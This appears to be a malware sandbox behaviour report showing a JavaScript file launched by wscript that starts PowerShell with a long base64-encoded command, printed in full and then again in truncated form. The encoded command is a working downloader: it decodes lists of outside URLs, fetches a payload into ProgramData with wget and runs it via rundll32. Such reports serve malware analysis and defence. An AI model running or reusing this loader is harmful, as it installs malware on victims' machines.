Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | May 23, 2023, 9:37 a.m. | May 23, 2023, 9:39 a.m. |
-
-
wscript.exe "C:\Windows\System32\wscript.exe" "C:\ProgramData\aeolus.js" OxeyesSpondaic quadragesima feculence TouristshipFeldspathization
2752-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABIAG8AbABpAHMAdABBAGMAeQBsAGEAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABRAEEATwBRAEEAdQBBAEQASQBBAE4AQQBBADEAQQBDADQAQQBNAGcAQQB3AEEARABrAEEATABnAEEAeQBBAEQAQQBBAE8AUQBBAD0ARwBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE4AdwBBAHUAQQBEAEUAQQBOAGcAQQAxAEEAQwA0AEEATQBRAEEANQBBAEQAawBBAEwAZwBBAHgAQQBEAGMAQQBNAHcAQQA9ACIAOwAkAG4AaQBiAG8AbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBBAEEAMwBBAEMANABBAE4AUQBBAHkAQQBDADQAQQBOAGcAQQA0AEEAQwA0AEEATQBRAEEAdwBBAEQAZwBBAFIARQBLAGwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABVAEEATQBRAEEAdQBBAEQARQBBAE0AZwBBADMAQQBDADQAQQBNAFEAQQAzAEEARABnAEEATABnAEEAeABBAEQASQBBAE0AdwBBAD0AUgBFAEsAbABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFADAAQQBiAHcAQgBwAEEASABJAEEAWQBRAEIAcABBAEYAQQBBAGMAZwBCAGwAQQBIAEEAQQBkAFEAQgB3AEEARwBFAEEAYgBBAEEAdQBBAEcANABBAGQAUQBBAD0AIgA7ACQAWQBhAGsAbwBuAGEAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAGsAQQBHAGsAQQBjAHcAQgB6AEEASABVAEEAWQBRAEIAawBBAEcARQBBAFkAZwBCAHMAQQBIAGsAQQBMAGcAQgBwAEEARwA0AEEAYQB3AEEAPQB5AHQAZQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEkAQQBNAHcAQQB1AEEARABFAEEATgBBAEEAMABBAEMANABBAE4AQQBBAHcAQQBDADQAQQBOAGcAQQB3AEEAQQA9AD0AIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEANQA7ACQAYQBzAGUAYwByAGUAdABvAHIAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAUQBBAFkAUQBCAHMAQQBHAHcAQQBiAHcAQgAzAEEARgBJAEEAWQBRAEIAawBBAEcAawBBAGIAdwBCAHMAQQBHAGsAQQBkAEEAQgBsAEEAQwA0AEEAWgBRAEIANABBAEgAQQBBAGIAdwBCAHoAQQBHAFUAQQBaAEEAQQA9ACIAOwAkAGQAbwBlAGwAaQBuAGcAQQByAGMAaABvAHYAZQByAHMAZQBlAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEQAQQBHADgAQQBjAHcAQgB0AEEARwA4AEEAWQB3AEIAeQBBAEcARQBBAGQAQQBBAHUAQQBIAFkAQQBhAFEAQgBoAEEARwBvAEEAWgBRAEIAegBBAEEAPQA9ACIAOwAkAGgAaQBiAGkAcwBjAHUAcwBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAGcAQQBNAFEAQQB1AEEARABFAEEATgBnAEEAdwBBAEMANABBAE8AUQBBAHkAQQBDADQAQQBNAFEAQQA1AEEARABJAEEAYQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHIAQQBHAEUAQQBhAFEAQgAyAEEARwBFAEEAYgBBAEIANQBBAEcARQBBAEwAZwBCAHAAQQBHADQAQQBhAHcAQQA9AGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBCAEEASABNAEEAWgBRAEIAcwBBAEcAdwBBAFkAUQBCADAAQQBHAFUAQQBSAFEAQgB0AEEASABBAEEAYQBBAEIAbABBAEcAMABBAFoAUQBCAHkAQQBHAEUAQQBiAEEAQgB1AEEARwBVAEEAYwB3AEIAegBBAEMANABBAFkAdwBCAHYAQQBIAFUAQQBiAGcAQgAwAEEASABJAEEAZQBRAEEAPQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA0AEEARABNAEEATABnAEEAeQBBAEQATQBBAE0AQQBBAHUAQQBEAGMAQQBOAHcAQQA9ACIAOwAkAGQAaQBvAHMAYwBvAHIAZQBpAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGMAQQBOAGcAQQB1AEEARABFAEEATQBnAEEAMABBAEMANABBAE0AUQBBADUAQQBEAGcAQQBMAGcAQQB5AEEARABFAEEATQB3AEEAdgBBAEUAWQBBAGMAdwBBADQAQQBGAEEAQQBlAFEAQQB2AEEARwB3AEEAUgBRAEIARgBBAEUAVQBBAFIAZwBBADQAQQBBAD0APQBiAHoAVQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAFEAQQB1AEEARABFAEEATgB3AEEAeQBBAEMANABBAE4AQQBBADEAQQBDADQAQQBOAHcAQQA1AEEAQwA4AEEAVQBBAEIAcwBBAEUAdwBBAE4AQQBCAHQAQQBGAFUAQQBMAHcAQgBuAEEARQBFAEEATQBBAEIAVQBBAEcAOABBAFMAQQBBAD0AYgB6AFUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA1AEEARABnAEEATABnAEEAeQBBAEQARQBBAE0AZwBBAHYAQQBIAE0AQQBNAEEAQgBCAEEAQwA4AEEAYwB3AEIANgBBAEUAZwBBAFUAdwBCAEkAQQBEAE0AQQBSAHcAQgBFAEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQATABlAHAAcgBvAHQAaQBjAEYAaQBkAGQAbABpAGUAcwAgAGkAbgAgACQAZABpAG8AcwBjAG8AcgBlAGkAbgAgAC0AcwBwAGwAaQB0ACAAIgBiAHoAVQAiACkAIAB7ACQAQwBhAHMAcwBvAGMAawBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBnAEEANQBBAEMANABBAE0AZwBBAHkAQQBEAFkAQQBMAGcAQQB5AEEARABJAEEATQBBAEEAdQBBAEQARQBBAE8AUQBBADQAQQBBAD0APQBXAGEAegBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAVABBAEcARQBBAGIAZwBCAGgAQQBIAFEAQQBiAHcAQgB5AEEARwBrAEEAYwBnAEIAcABBAEgAVQBBAGIAUQBCAHoAQQBGAE0AQQBkAEEAQgB5AEEARwBFAEEAWQB3AEIAagBBAEcAZwBBAGEAUQBCAHUAQQBHADgAQQBMAGcAQgAyAEEARwBrAEEAYgBBAEIAcwBBAEcARQBBAGMAdwBBAD0AVwBhAHoAUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAEUAQQBMAGcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQAwAEEARABnAEEAIgA7ACQAUABlAGMAaABlAGQATABhAGQAeQBoAG8AbwBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBwAEEARwA0AEEAZABBAEIAbABBAEgASQBBAFkAdwBCAHAAQQBIAEEAQQBhAFEAQgBsAEEARwA0AEEAZABBAEEAdQBBAEgAQQBBAGEAUQBCAGoAQQBIAFEAQQBkAFEAQgB5AEEARwBVAEEAYwB3AEEAPQBDAHIARgBsAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIASABBAEcAawBBAFkAUQBCAHQAQQBHAEkAQQBaAFEAQgAxAEEASABnAEEATABnAEIAcQBBAEgAQQBBACIAOwAkAHUAbgBzAGUAZQBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBrAEEARwBFAEEAYwBnAEIAbABBAEcARQBBAGIAQQBCAHMAQQBGAFUAQQBiAGcAQgB3AEEARwBFAEEAYwBnAEIAcgBBAEcAVQBBAFoAQQBBAHUAQQBHAFEAQQBaAFEAQgB1AEEASABRAEEAWQBRAEIAcwBBAEEAPQA9AGUAQQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBRAEEANQBBAEMANABBAE0AZwBBADEAQQBEAFEAQQBMAGcAQQA0AEEARABRAEEATABnAEEAeABBAEQAUQBBAE4AdwBBAD0AZQBBAD0AdQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEUAQQBjAFEAQgAxAEEARwBFAEEAYwBnAEIAcABBAEgATQBBAGQAQQBCAHoAQQBDADQAQQBZAHcAQgBoAEEARwBZAEEAWgBRAEEAPQAiADsAdAByAHkAIAB7ACQAQQBuAGkAcwBpAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAE0AQQBaAFEAQgB0AEEARwBrAEEAYwBBAEIAeQBBAEcAOABBAGIAZwBCAGwAQQBHADQAQQBaAFEAQgB6AEEASABNAEEAVQBBAEIAbwBBAEcAOABBAGIAZwBCAHYAQQBIAE0AQQBMAGcAQgB1AEEASABrAEEAWQB3AEEAPQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAZwBBAEwAZwBBAHgAQQBEAEUAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAdwBBAEMANABBAE0AUQBBADMAQQBEAFkAQQAiADsAJABSAGUAdAByAG8AbQBpAGcAcgBhAHQAaQBvAG4AUwBhAGwAdABpAHIAZQB3AGkAcwBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABVAEEAYgBnAEIAdgBBAEcASQBBAGIAQQBCAHAAQQBHAGMAQQBZAFEAQgAwAEEARwBVAEEAWgBBAEIATgBBAEcAOABBAGMAZwBCADAAQQBHAEUAQQBiAEEAQgB6AEEAQwA0AEEAYwB3AEIAbwBBAEcAOABBAGQAdwBBAD0AIgA7ACQARQBsAGUAYwB0AHIAbwBsAHkAegBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AUQBBADQAQQBDADQAQQBNAFEAQQAzAEEARABZAEEATABnAEEAeABBAEQATQBBAE4AZwBBAHUAQQBEAEkAQQBNAHcAQQA0AEEAQQA9AD0AIgA7ACQAbgBvAG4AbQBpAGwAaQB0AGEAbgB0AGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABMAGUAcAByAG8AdABpAGMARgBpAGQAZABsAGkAZQBzACkAKQA7AHcAZwBlAHQAIAAkAG4AbwBuAG0AaQBsAGkAdABhAG4AdABsAHkAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwASQBkAGUAbwBwAHIAYQB4AGkAcwB0AC4AUgB1AG0AaQBuAGEAdABpAHYAZQA7ACQARABhAG0AYQBzAGsAaQBuAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFUAQQBOAEEAQQB1AEEARABFAEEATwBRAEEAeABBAEMANABBAE0AZwBBADAAQQBEAEUAQQBMAGcAQQA1AEEARABjAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwASQBkAGUAbwBwAHIAYQB4AGkAcwB0AC4AUgB1AG0AaQBuAGEAdABpAHYAZQApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANQAxADcAMgA3ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARQBrAEEAWgBBAEIAbABBAEcAOABBAGMAQQBCAHkAQQBHAEUAQQBlAEEAQgBwAEEASABNAEEAZABBAEEAdQBBAEYASQBBAGQAUQBCAHQAQQBHAGsAQQBiAGcAQgBoAEEASABRAEEAYQBRAEIAMgBBAEcAVQBBAEwAQQBCADIAQQBHAGsAQQBjAEEAQgB6AEEARABzAEEAYwB3AEIAcwBBAEcARQBBAFkAdwBCAHIAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEAIgA7ACQAcwB1AG0AbQBpAG4AZwBzAFAAbwBsAGwAZQByAGEAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAegBBAEgAUQBBAGQAUQBCAGgAQQBIAEkAQQBkAEEAQgBwAEEARwBFAEEAUQB3AEIAaABBAEgASQBBAFoAQQBCADEAQQBHAFUAQQBiAEEAQgBwAEEASABNAEEATABnAEIAMwBBAEcAOABBAGMAZwBCAHIAQQBBAD0APQBKAE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB3AEEARwA4AEEAYQBRAEIAcgBBAEcAawBBAGIAQQBCAHYAQQBHAEkAQQBiAEEAQgBoAEEASABNAEEAZABBAEEAdQBBAEcATQBBAGIAdwBCADEAQQBIAEkAQQBjAHcAQgBsAEEASABNAEEAIgA7ACQAdABvAGcAbABlAHMAcwBDAG8AcgBuAGMAcgBhAGsAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgATQBBAGQAQQBCAGgAQQBIAEEAQQBhAEEAQgA1AEEARwB3AEEAYQBRAEIAdQBBAEcAVQBBAFYAQQBCAG8AQQBHAGsAQQBiAFEAQgBpAEEARwB3AEEAWgBRAEIAdABBAEcARQBBAGIAZwBBAHUAQQBHAE0AQQBiAHcAQgB0AEEAQQA9AD0AIgA7ACQAZwBsAHUAZQBtAGEAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUQBBAEgASQBBAFoAUQBCADAAQQBIAEkAQQBZAFEAQgB1AEEASABNAEEAWQBRAEIAagBBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBTAGcAQgBoAEEASABJAEEAWgB3AEIAdgBBAEcAOABBAGIAZwBCAHoAQQBDADQAQQBZAHcAQgB2AEEARwA0AEEAZABBAEIAeQBBAEcARQBBAFkAdwBCADAAQQBHADgAQQBjAGcAQgB6AEEAQQA9AD0AZAB0AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAFEAQQAxAEEARABJAEEATABnAEEAeABBAEQAWQBBAE0AdwBBAHUAQQBEAEkAQQBNAGcAQQA0AEEAQQA9AD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAJABTAHUAcgBhAGQAZABpAHQAaQBvAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFQAQQBHAGcAQQBhAFEAQgB1AEEASABRAEEAYgB3AEIAcABBAEgATQBBAGQAQQBCAEoAQQBIAE0AQQBiAHcAQgB0AEEARwBVAEEAYwBnAEIAdgBBAEcAMABBAGIAdwBCAHkAQQBIAEEAQQBhAEEAQgBwAEEASABNAEEAYgBRAEEAdQBBAEcATQBBAGIAdwBCAHQAQQBHADAAQQBkAFEAQgB1AEEARwBrAEEAZABBAEIANQBBAEEAPQA9AFcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgB3AEEAdwBBAEMANABBAE0AZwBBADEAQQBEAFUAQQBMAGcAQQB4AEEARABRAEEATgBnAEEAdQBBAEQARQBBAE8AUQBBADIAQQBBAD0APQBXAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQATQBBAE4AQQBBAHUAQQBEAGsAQQBNAEEAQQB1AEEARABZAEEATgBnAEEAdQBBAEQAZwBBAE8AUQBBAD0AVwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHQAQQBHAEUAQQBiAGcAQgAwAEEARwBrAEEAYwB3AEIAcABBAEcARQBBAEwAZwBCADEAQQBIAE0AQQAiADsAJABpAGIAdQBwAHIAbwBmAGUAbgBEAGUAcgBlAGcAdQBsAGEAdABpAG8AbgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBjAEEAZABRAEIAaQBBAEcAVQBBAGMAZwBCAHUAQQBHAEUAQQBiAGcAQgBqAEEARwBVAEEATABnAEIAagBBAEcARQBBAFoAZwBCAGwAQQBBAD0APQBGAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAGIAdwBCAHMAQQBIAGsAQQBjAEEAQgBvAEEARwA4AEEAYgBnAEIAcABBAEgATQBBAGIAUQBCAEMAQQBHAHcAQQBaAFEAQgB3AEEARwBnAEEAWQBRAEIAeQBBAEcAOABBAGMAQQBCAG8AQQBIAFEAQQBhAEEAQgBoAEEARwB3AEEAYgBRAEIAcABBAEcARQBBAEwAZwBCAG8AQQBHADgAQQBjAGcAQgB6AEEARwBVAEEARgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEoAQQBHADQAQQBjAHcAQgAwAEEARwBrAEEAZABBAEIAMQBBAEgAUQBBAFoAUQBCAHkAQQBIAE0AQQBVAHcAQgB0AEEARwA4AEEAYQB3AEIAbABBAEgATQBBAEwAZwBCAGkAQQBHAEUAQQBiAGcAQgBrAEEAQQA9AD0AIgA7AH0AfQAkAFYAaQB0AHQAbABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMgBBAEQAQQBBAEwAZwBBAHkAQQBEAEUAQQBOAHcAQQB1AEEARABZAEEATwBRAEEAdQBBAEQASQBBAE0AdwBBAHgAQQBBAD0APQBvAG4AYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQAwAEEAWgBRAEIAegBBAEcAMABBAFoAUQBCAHkAQQBHAGsAQQBjAHcAQgBsAEEAQwA0AEEAWgBnAEIAaABBAEcAawBBAGIAQQBBAD0AbwBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE8AUQBBAHUAQQBEAEUAQQBOAGcAQQA1AEEAQwA0AEEATgBnAEEANQBBAEMANABBAE0AZwBBAHoAQQBEAEkAQQBvAG4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATQBnAEEAdQBBAEQARQBBAE4AUQBBADAAQQBDADQAQQBNAFEAQQB4AEEARABZAEEATABnAEEAeABBAEQAYwBBAE8AQQBBAD0AIgA7ACQAbQBpAGMAcgBvAHAAaABhAGcAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AZwBBAHcAQQBDADQAQQBOAGcAQQB5AEEAQwA0AEEATQBRAEEAMgBBAEQAQQBBAEwAZwBBAHkAQQBEAEkAQQBOAGcAQQA9AHEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBZAEEAWQBRAEIAdABBAEcAawBBAGIAQQBCAHAAQQBHAEUAQQBjAGcAQgBwAEEASABRAEEAZQBRAEEAdQBBAEcAUQBBAGIAdwBCADMAQQBHADQAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAPQAiADsA"
2872
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
No hosts contacted. |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABIAG8AbABpAHMAdABBAGMAeQBsAGEAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABRAEEATwBRAEEAdQBBAEQASQBBAE4AQQBBADEAQQBDADQAQQBNAGcAQQB3AEEARABrAEEATABnAEEAeQBBAEQAQQBBAE8AUQBBAD0ARwBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE4AdwBBAHUAQQBEAEUAQQBOAGcAQQAxAEEAQwA0AEEATQBRAEEANQBBAEQAawBBAEwAZwBBAHgAQQBEAGMAQQBNAHcAQQA9ACIAOwAkAG4AaQBiAG8AbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBBAEEAMwBBAEMANABBAE4AUQBBAHkAQQBDADQAQQBOAGcAQQA0AEEAQwA0AEEATQBRAEEAdwBBAEQAZwBBAFIARQBLAGwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABVAEEATQBRAEEAdQBBAEQARQBBAE0AZwBBADMAQQBDADQAQQBNAFEAQQAzAEEARABnAEEATABnAEEAeABBAEQASQBBAE0AdwBBAD0AUgBFAEsAbABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFADAAQQBiAHcAQgBwAEEASABJAEEAWQBRAEIAcABBAEYAQQBBAGMAZwBCAGwAQQBIAEEAQQBkAFEAQgB3AEEARwBFAEEAYgBBAEEAdQBBAEcANABBAGQAUQBBAD0AIgA7ACQAWQBhAGsAbwBuAGEAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAGsAQQBHAGsAQQBjAHcAQgB6AEEASABVAEEAWQBRAEIAawBBAEcARQBBAFkAZwBCAHMAQQBIAGsAQQBMAGcAQgBwAEEARwA0AEEAYQB3AEEAPQB5AHQAZQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEkAQQBNAHcAQQB1AEEARABFAEEATgBBAEEAMABBAEMANABBAE4AQQBBAHcAQQBDADQAQQBOAGcAQQB3AEEAQQA9AD0AIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEANQA7ACQAYQBzAGUAYwByAGUAdABvAHIAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAUQBBAFkAUQBCAHMAQQBHAHcAQQBiAHcAQgAzAEEARgBJAEEAWQBRAEIAawBBAEcAawBBAGIAdwBCAHMAQQBHAGsAQQBkAEEAQgBsAEEAQwA0AEEAWgBRAEIANABBAEgAQQBBAGIAdwBCAHoAQQBHAFUAQQBaAEEAQQA9ACIAOwAkAGQAbwBlAGwAaQBuAGcAQQByAGMAaABvAHYAZQByAHMAZQBlAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEQAQQBHADgAQQBjAHcAQgB0AEEARwA4AEEAWQB3AEIAeQBBAEcARQBBAGQAQQBBAHUAQQBIAFkAQQBhAFEAQgBoAEEARwBvAEEAWgBRAEIAegBBAEEAPQA9ACIAOwAkAGgAaQBiAGkAcwBjAHUAcwBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAGcAQQBNAFEAQQB1AEEARABFAEEATgBnAEEAdwBBAEMANABBAE8AUQBBAHkAQQBDADQAQQBNAFEAQQA1AEEARABJAEEAYQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHIAQQBHAEUAQQBhAFEAQgAyAEEARwBFAEEAYgBBAEIANQBBAEcARQBBAEwAZwBCAHAAQQBHADQAQQBhAHcAQQA9AGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBCAEEASABNAEEAWgBRAEIAcwBBAEcAdwBBAFkAUQBCADAAQQBHAFUAQQBSAFEAQgB0AEEASABBAEEAYQBBAEIAbABBAEcAMABBAFoAUQBCAHkAQQBHAEUAQQBiAEEAQgB1AEEARwBVAEEAYwB3AEIAegBBAEMANABBAFkAdwBCAHYAQQBIAFUAQQBiAGcAQgAwAEEASABJAEEAZQBRAEEAPQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA0AEEARABNAEEATABnAEEAeQBBAEQATQBBAE0AQQBBAHUAQQBEAGMAQQBOAHcAQQA9ACIAOwAkAGQAaQBvAHMAYwBvAHIAZQBpAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGMAQQBOAGcAQQB1AEEARABFAEEATQBnAEEAMABBAEMANABBAE0AUQBBADUAQQBEAGcAQQBMAGcAQQB5AEEARABFAEEATQB3AEEAdgBBAEUAWQBBAGMAdwBBADQAQQBGAEEAQQBlAFEAQQB2AEEARwB3AEEAUgBRAEIARgBBAEUAVQBBAFIAZwBBADQAQQBBAD0APQBiAHoAVQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAFEAQQB1AEEARABFAEEATgB3AEEAeQBBAEMANABBAE4AQQBBADEAQQBDADQAQQBOAHcAQQA1AEEAQwA4AEEAVQBBAEIAcwBBAEUAdwBBAE4AQQBCAHQAQQBGAFUAQQBMAHcAQgBuAEEARQBFAEEATQBBAEIAVQBBAEcAOABBAFMAQQBBAD0AYgB6AFUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA1AEEARABnAEEATABnAEEAeQBBAEQARQBBAE0AZwBBAHYAQQBIAE0AQQBNAEEAQgBCAEEAQwA4AEEAYwB3AEIANgBBAEUAZwBBAFUAdwBCAEkAQQBEAE0AQQBSAHcAQgBFAEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQATABlAHAAcgBvAHQAaQBjAEYAaQBkAGQAbABpAGUAcwAgAGkAbgAgACQAZABpAG8AcwBjAG8AcgBlAGkAbgAgAC0AcwBwAGwAaQB0ACAAIgBiAHoAVQAiACkAIAB7ACQAQwBhAHMAcwBvAGMAawBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBnAEEANQBBAEMANABBAE0AZwBBAHkAQQBEAFkAQQBMAGcAQQB5AEEARABJAEEATQBBAEEAdQBBAEQARQBBAE8AUQBBADQA